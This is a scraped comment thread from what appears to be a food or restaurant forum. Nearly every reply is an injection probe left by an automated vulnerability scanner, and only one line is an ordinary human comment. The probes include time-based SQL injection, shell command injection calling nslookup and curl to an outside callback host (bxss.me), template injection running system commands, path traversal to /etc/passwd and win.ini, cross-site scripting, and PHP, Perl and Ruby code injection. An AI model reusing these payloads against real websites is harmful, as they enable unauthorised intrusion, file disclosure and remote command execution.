re: mirugai

&echo eehgmx$()\ xfwbpm\nz^xyu||a #' &echo eehgmx$()\ xfwbpm\nz^xyu||a #|" &echo eehgmx$()\ xfwbpm\nz^xyu||a #

1753894583

re: mirugai

replies/.

1753894583

re: mirugai

${@print(md5(31337))}\

1753894583

1753894584

re: mirugai


'"()&%<zzz><ScRiPt >6qzV(9879)</ScRiPt>

1753894584

re: mirugai

|echo qnxsim$()\ bnyuvk\nz^xyu||a #' |echo qnxsim$()\ bnyuvk\nz^xyu||a #|" |echo qnxsim$()\ bnyuvk\nz^xyu||a #

1753894585

re: mirugai

'.print(md5(31337)).'

1753894585

re: mirugai

{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitveiwsdirwua85a9.bxss.me")}}

1753894585

re: mirugai

expr 9000429353 - 977371

1753894586

re: mirugai

'"()&%<zzz><ScRiPt >6qzV(9886)</ScRiPt>

1753894587

re: mirugai

(nslookup -q=cname hitxwubtktmpl42365.bxss.me||curl hitxwubtktmpl42365.bxss.me))

1753894587

re: mirugai


9599692

1753894588

re: mirugai

$(nslookup -q=cname hityxjqcdrphw19e69.bxss.me||curl hityxjqcdrphw19e69.bxss.me)

1753894588

re: mirugai

'"()

1753894588

re: mirugai

&nslookup -q=cname hituyxvkrnquyac00c.bxss.me&'\"`0&nslookup -q=cname hituyxvkrnquyac00c.bxss.me&`'

1753894589

re: mirugai


'&&sleep(27*1000)*mlzxvd&&'

1753894589

re: mirugai

&(nslookup -q=cname hitaasdprfvfg4e2bd.bxss.me||curl hitaasdprfvfg4e2bd.bxss.me)&'\"`0&(nslookup -q=cname hitaasdprfvfg4e2bd.bxss.me||curl hitaasdprfvfg4e2bd.bxss.me)&`'

1753894590

re: mirugai


"&&sleep(27*1000)*glnzob&&"

1753894591

re: mirugai

|(nslookup -q=cname hitnmspolenrse4c02.bxss.me||curl hitnmspolenrse4c02.bxss.me)

1753894591

re: mirugai


'||sleep(27*1000)*ihveqm||'

1753894592

re: mirugai

`(nslookup -q=cname hitegnfailjzf75f99.bxss.me||curl hitegnfailjzf75f99.bxss.me)`

1753894593

re: mirugai


"||sleep(27*1000)*ezgvtf||"

1753894593

re: mirugai

;(nslookup -q=cname hitjojqwnmvaf07a60.bxss.me||curl hitjojqwnmvaf07a60.bxss.me)|(nslookup -q=cname hitjojqwnmvaf07a60.bxss.me||curl hitjojqwnmvaf07a60.bxss.me)&(nslookup -q=cname hitjojqwnmvaf07a60.bxss.me||curl hitjojqwnmvaf07a60.bxss.me)

1753894593

re: mirugai

|(nslookup${IFS}-q${IFS}cname${IFS}hitoqzlxgobzn8ef8e.bxss.me||curl${IFS}hitoqzlxgobzn8ef8e.bxss.me)

1753894595

re: mirugai

&(nslookup${IFS}-q${IFS}cname${IFS}hitawlxwkkprgd04db.bxss.me||curl${IFS}hitawlxwkkprgd04db.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitawlxwkkprgd04db.bxss.me||curl${IFS}hitawlxwkkprgd04db.bxss.me)&`'

1753894596

re: mirugai


o9DyEUWo

1753894760

re: mirugai


*1

1753894767

re: mirugai


*1

1753894767

re: mirugai


*1

1753894768

re: mirugai


*1

1753894769

re: mirugai

-1 OR 5*5=25 --

1753894770

re: mirugai

-1 OR 5*5=26 --

1753894770

re: mirugai

-1 OR 5*5=25

1753894771

re: mirugai

-1 OR 5*5=26

1753894772

re: mirugai


*if(now()=sysdate(),sleep(15),0)

1753894778

re: mirugai


0'XOR(
*if(now()=sysdate(),sleep(15),0))XOR'Z

1753894788

re: mirugai


0"XOR(
*if(now()=sysdate(),sleep(15),0))XOR"Z

1753894794

re: mirugai

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

1753894800

re: mirugai


-1; waitfor delay '0:0:15' --

1753894808

re: mirugai


-1); waitfor delay '0:0:15' --

1753894816

re: mirugai


-1 waitfor delay '0:0:15' --

1753894823

re: mirugai


7zXFXD6y'; waitfor delay '0:0:15' --

1753894828

re: mirugai


-1 OR 288=(SELECT 288 FROM PG_SLEEP(15))--

1753894835

re: mirugai


-1) OR 698=(SELECT 698 FROM PG_SLEEP(15))--

1753894840

re: mirugai


-1)) OR 537=(SELECT 537 FROM PG_SLEEP(15))--

1753894846

re: mirugai


9sWkJISN' OR 343=(SELECT 343 FROM PG_SLEEP(15))--

1753894852

re: mirugai


gjUNapV6') OR 618=(SELECT 618 FROM PG_SLEEP(15))--

1753894858

re: mirugai


Gzsk0iLA')) OR 901=(SELECT 901 FROM PG_SLEEP(15))--

1753894863

re: mirugai


*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1753894868

re: mirugai


'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1753894873

re: mirugai

'||(select 1 from (select pg_sleep(15))x)||'

1753894879

re: mirugai

''||(select 1 from (select pg_sleep(15))x)||''

1753894886

re: mirugai


'"

1753894887

re: mirugai

@@AtQzl

1753894889

re: mirugai

(select 198766*667891)

1753894890

re: mirugai

(select 198766*667891 from DUAL)

1753894891

Thanks for the replies. I suspected the reality was less impressive than the PR.

1680674664 Reply
Add photos

re: thetokyogourmet

4yW8735v

1697002545

re: thetokyogourmet

1*

1697002546

re: thetokyogourmet

1*

1697002546

re: thetokyogourmet

1*

1697002546

re: thetokyogourmet

1*

1697002546

re: thetokyogourmet

-1 OR 2+272-272-1=0+0+0+1

1697002547

re: thetokyogourmet

-1 OR 3+272-272-1=0+0+0+1

1697002547

re: thetokyogourmet

if(now()=sysdate(),sleep(15),0)

1697002552

re: thetokyogourmet

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

1697002557

re: thetokyogourmet

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

1697002561

re: thetokyogourmet

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

1697002566

re: thetokyogourmet

-1; waitfor delay '0:0:15' --

1697002571

re: thetokyogourmet

-1); waitfor delay '0:0:15' --

1697002575

re: thetokyogourmet

1 waitfor delay '0:0:15' --

1697002580

re: thetokyogourmet

YmD9VZGs'; waitfor delay '0:0:15' --

1697002584

re: thetokyogourmet

-5 OR 426=(SELECT 426 FROM PG_SLEEP(15))--

1697002588

re: thetokyogourmet

-5) OR 162=(SELECT 162 FROM PG_SLEEP(15))--

1697002593

re: thetokyogourmet

-1)) OR 108=(SELECT 108 FROM PG_SLEEP(15))--

1697002598

re: thetokyogourmet

W8ZV9sRO' OR 691=(SELECT 691 FROM PG_SLEEP(15))--

1697002602

re: thetokyogourmet

qpGtXlPn

1697002603

re: thetokyogourmet

1*

1697002603

re: thetokyogourmet

1*

1697002604

re: thetokyogourmet

1*

1697002604

re: thetokyogourmet

1*

1697002604

re: thetokyogourmet

-1 OR 2+900-900-1=0+0+0+1

1697002604

re: thetokyogourmet

-1 OR 3+900-900-1=0+0+0+1

1697002605

re: thetokyogourmet

BQPiKUGM') OR 835=(SELECT 835 FROM PG_SLEEP(15))--

1697002606

re: thetokyogourmet

if(now()=sysdate(),sleep(15),0)

1697002609

re: thetokyogourmet

RqEq6rqy')) OR 149=(SELECT 149 FROM PG_SLEEP(15))--

1697002611

re: thetokyogourmet

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

1697002615

re: thetokyogourmet


*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1697002617

re: thetokyogourmet

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

1697002619

re: thetokyogourmet


'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1697002621

re: thetokyogourmet

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

1697002623

re: thetokyogourmet

'||(select 1 from (select pg_sleep(15))x)||'

1697002625

re: thetokyogourmet

-1; waitfor delay '0:0:15' --

1697002627

re: thetokyogourmet

''||(select 1 from (select pg_sleep(15))x)||''

1697002629

re: thetokyogourmet

1'"

1697002629

re: thetokyogourmet

@@NO4a6

1697002630

re: thetokyogourmet

-1); waitfor delay '0:0:15' --

1697002632

re: thetokyogourmet

1 waitfor delay '0:0:15' --

1697002637

re: thetokyogourmet

56oVhdtu'; waitfor delay '0:0:15' --

1697002641

re: thetokyogourmet

-5 OR 297=(SELECT 297 FROM PG_SLEEP(15))--

1697002646

re: thetokyogourmet

-5) OR 554=(SELECT 554 FROM PG_SLEEP(15))--

1697002650

re: thetokyogourmet

-1)) OR 126=(SELECT 126 FROM PG_SLEEP(15))--

1697002654

re: thetokyogourmet

Hyj4pUip' OR 511=(SELECT 511 FROM PG_SLEEP(15))--

1697002662

re: thetokyogourmet

lpK0saFJ') OR 789=(SELECT 789 FROM PG_SLEEP(15))--

1697002665

re: thetokyogourmet

CwrTGiQV')) OR 766=(SELECT 766 FROM PG_SLEEP(15))--

1697002669

re: thetokyogourmet


*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1697002673

re: thetokyogourmet


'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1697002677

re: thetokyogourmet

'||(select 1 from (select pg_sleep(15))x)||'

1697002682

re: thetokyogourmet

''||(select 1 from (select pg_sleep(15))x)||''

1697002685

re: thetokyogourmet

1'"

1697002686

re: thetokyogourmet

@@f4i8a

1697002686

re: thetokyogourmet

1D9MhAQEO

1727141165

re: thetokyogourmet

response.write(9402255*9079911)

1727141170

re: thetokyogourmet

%0abcc:074625.67-13762.67.b436f.19990.2@bxss.me

1727141170

re: thetokyogourmet

<esi:include src="http://bxss.me/rpb.png"/>

1727141170

re: thetokyogourmet

'+response.write(9402255*9079911)+'

1727141170

re: thetokyogourmet

to@example.com>%0d%0abcc:074625.67-13763.67.b436f.19990.2@bxss.me

1727141171

re: thetokyogourmet

"+response.write(9402255*9079911)+"

1727141171

re: thetokyogourmet

${9999840+10000311}

1727141172

re: thetokyogourmet

../../../../../../../../../../../../../../etc/passwd

1727141173

re: thetokyogourmet

../../../../../../../../../../../../../../windows/win.ini

1727141174

re: thetokyogourmet

file:///etc/passwd

1727141175

re: thetokyogourmet

../../../../../../../../../../../../../../../proc/version

1727141176

re: thetokyogourmet

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

1727141177

re: thetokyogourmet

)

1727141178

re: thetokyogourmet

../../../../../../../../../../etc/passwd%00.jpg

1727141178

re: thetokyogourmet

'.gethostbyname(lc('hitwl'.'ncgowndr40dd7.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(107).chr(68).chr(112).chr(82).'

1727141178

re: thetokyogourmet

!(()&&!|*|*|

1727141179

re: thetokyogourmet

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1727141179

re: thetokyogourmet

".gethostbyname(lc("hitfv"."iydgahnebe6a0.bxss.me."))."A".chr(67).chr(hex("58")).chr(114).chr(77).chr(109).chr(82)."

1727141179

re: thetokyogourmet

^(#$!@#$)(()))******

1727141180

re: thetokyogourmet

/../..//../..//../..//../..//../..//etc/passwd%00.jpg

1727141180

re: thetokyogourmet

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1727141181

re: thetokyogourmet

/etc/passwd

1727141182

re: thetokyogourmet

1727141182

re: thetokyogourmet

%2fetc%2fpasswd

1727141182

re: thetokyogourmet

bxss.me/t/xss.html?%00

1727141183

re: thetokyogourmet

echo nluogo$()\ gvfike\nz^xyu||a #' &echo nluogo$()\ gvfike\nz^xyu||a #|" &echo nluogo$()\ gvfike\nz^xyu||a #

1727141183

re: thetokyogourmet

/.././.././.././.././.././.././.././../etc/./passwd%00

1727141183

re: thetokyogourmet

"+"A".concat(70-3).concat(22*4).concat(114).concat(75).concat(116).concat(76)+(require"socket"
Socket.gethostbyname("hitcc"+"ohegohlkba321.bxss.me.")[3].to_s)+"

1727141184

re: thetokyogourmet

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1727141184

1727141184

re: thetokyogourmet

&echo nstvfa$()\ xkzrfw\nz^xyu||a #' &echo nstvfa$()\ xkzrfw\nz^xyu||a #|" &echo nstvfa$()\ xkzrfw\nz^xyu||a #

1727141184

re: thetokyogourmet

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1727141184

re: thetokyogourmet

'+'A'.concat(70-3).concat(22*4).concat(97).concat(75).concat(122).concat(78)+(require'socket'
Socket.gethostbyname('hitht'+'celsobil8d958.bxss.me.')[3].to_s)+'

1727141185

re: thetokyogourmet

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg

1727141185

re: thetokyogourmet

|echo scinwf$()\ umbdqj\nz^xyu||a #' |echo scinwf$()\ umbdqj\nz^xyu||a #|" |echo scinwf$()\ umbdqj\nz^xyu||a #

1727141185

re: thetokyogourmet

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1727141185

re: thetokyogourmet

1727141186

re: thetokyogourmet

(nslookup hitnggkvpevnq69651.bxss.me||perl -e "gethostbyname('hitnggkvpevnq69651.bxss.me')")

1727141186

re: thetokyogourmet

../././../././../././../././../././../././../././../././../././../././etc/passwd

1727141186

re: thetokyogourmet

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

1727141186

re: thetokyogourmet

1727141187

re: thetokyogourmet

'"

1727141187

re: thetokyogourmet

..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd

1727141187

re: thetokyogourmet

$(nslookup hitaewqhxeehmdbbaa.bxss.me||perl -e "gethostbyname('hitaewqhxeehmdbbaa.bxss.me')")

1727141187

re: thetokyogourmet

';print(md5(31337));$a='

1727141187

re: thetokyogourmet

/etc/shells

1727141188

re: thetokyogourmet

<!--

1727141188

re: thetokyogourmet

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

1727141188

re: thetokyogourmet

&nslookup hityamlktnwpw7e504.bxss.me&'\"`0&nslookup hityamlktnwpw7e504.bxss.me&`'

1727141188

re: thetokyogourmet

";print(md5(31337));$a="

1727141188

re: thetokyogourmet

c:/windows/win.ini

1727141188

re: thetokyogourmet

file:///etc/passwd

1727141189

re: thetokyogourmet

&(nslookup hitivgdznofcva6ab4.bxss.me||perl -e "gethostbyname('hitivgdznofcva6ab4.bxss.me')")&'\"`0&(nslookup hitivgdznofcva6ab4.bxss.me||perl -e "gethostbyname('hitivgdznofcva6ab4.bxss.me')")&`'

1727141189

re: thetokyogourmet

${@print(md5(31337))}

1727141189

re: thetokyogourmet

bxss.me

1727141189

re: thetokyogourmet

/\../\../\../\../\../\../\../etc/passwd

1727141189

re: thetokyogourmet

|(nslookup hitnhgtoqrmzy4c2e1.bxss.me||perl -e "gethostbyname('hitnhgtoqrmzy4c2e1.bxss.me')")

1727141190

re: thetokyogourmet

${@print(md5(31337))}\

1727141190

re: thetokyogourmet

/WEB-INF/web.xml

1727141190

re: thetokyogourmet

`(nslookup hitqldsncwexs1a7af.bxss.me||perl -e "gethostbyname('hitqldsncwexs1a7af.bxss.me')")`

1727141190

re: thetokyogourmet

'.print(md5(31337)).'

1727141191

re: thetokyogourmet

C:\WINDOWS\system32\drivers\etc\hosts

1727141191

re: thetokyogourmet

;(nslookup hitpotgcxrwgm020cd.bxss.me||perl -e "gethostbyname('hitpotgcxrwgm020cd.bxss.me')")|(nslookup hitpotgcxrwgm020cd.bxss.me||perl -e "gethostbyname('hitpotgcxrwgm020cd.bxss.me')")&(nslookup hitpotgcxrwgm020cd.bxss.me||perl -e "gethostbyname('hitpotgcxrwgm020cd.bxss.me')")

1727141191

re: thetokyogourmet

../../../../../../../../../../windows/win.ini%00.jpg

1727141192

re: thetokyogourmet

/../../../../../../../../../../boot.ini

1727141193

re: thetokyogourmet

%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini

1727141193

re: thetokyogourmet

..\..\..\..\..\..\..\..\windows\win.ini

1727141194

re: thetokyogourmet

..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini

1727141195

re: thetokyogourmet

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1727141196

re: thetokyogourmet

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1727141197

re: thetokyogourmet

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1727141198

re: thetokyogourmet

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

1727141199

re: thetokyogourmet

WEB-INF/web.xml

1727141200

re: thetokyogourmet

WEB-INF\web.xml

1727141201

re: thetokyogourmet

1

1727141614

re: thetokyogourmet

1

1727141651

re: thetokyogourmet

-1 OR 2+632-632-1=0+0+0+1 --

1727141652

re: thetokyogourmet

-1 OR 3+632-632-1=0+0+0+1 --

1727141652

re: thetokyogourmet

-1 OR 2+859-859-1=0+0+0+1

1727141653

re: thetokyogourmet

-1 OR 3+859-859-1=0+0+0+1

1727141653

re: thetokyogourmet

-1' OR 2+682-682-1=0+0+0+1 --

1727141653

re: thetokyogourmet

-1' OR 3+682-682-1=0+0+0+1 --

1727141654

re: thetokyogourmet

-1' OR 2+569-569-1=0+0+0+1 or 'eKcLoK1t'='

1727141654

re: thetokyogourmet

-1' OR 3+569-569-1=0+0+0+1 or 'eKcLoK1t'='

1727141655

re: thetokyogourmet

-1" OR 2+160-160-1=0+0+0+1 --

1727141655

re: thetokyogourmet

-1" OR 3+160-160-1=0+0+0+1 --

1727141656

re: thetokyogourmet

if(now()=sysdate(),sleep(15),0)

1727141689

re: thetokyogourmet

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

1727141702

re: thetokyogourmet

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

1727141715

re: thetokyogourmet

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

1727141726

re: thetokyogourmet

-1; waitfor delay '0:0:15' --

1727141737

re: thetokyogourmet

-1); waitfor delay '0:0:15' --

1727141748

re: thetokyogourmet

1 waitfor delay '0:0:15' --

1727141759

re: thetokyogourmet

dPukxIMd'; waitfor delay '0:0:15' --

1727141770

re: thetokyogourmet

-5 OR 720=(SELECT 720 FROM PG_SLEEP(15))--

1727141779

re: thetokyogourmet

-5) OR 160=(SELECT 160 FROM PG_SLEEP(15))--

1727141787

re: thetokyogourmet

-1)) OR 730=(SELECT 730 FROM PG_SLEEP(15))--

1727141796

re: thetokyogourmet

8ah2nDAU' OR 612=(SELECT 612 FROM PG_SLEEP(15))--

1727141804

re: thetokyogourmet

XchLWGAX') OR 294=(SELECT 294 FROM PG_SLEEP(15))--

1727141813

re: thetokyogourmet

7EWRXkhw')) OR 292=(SELECT 292 FROM PG_SLEEP(15))--

1727141826

re: thetokyogourmet

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1727141837

re: thetokyogourmet

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1727141848

re: thetokyogourmet

'||(select 1 from (select pg_sleep(15))x)||'

1727141860

re: thetokyogourmet

''||(select 1 from (select pg_sleep(15))x)||''

1727141873

re: thetokyogourmet

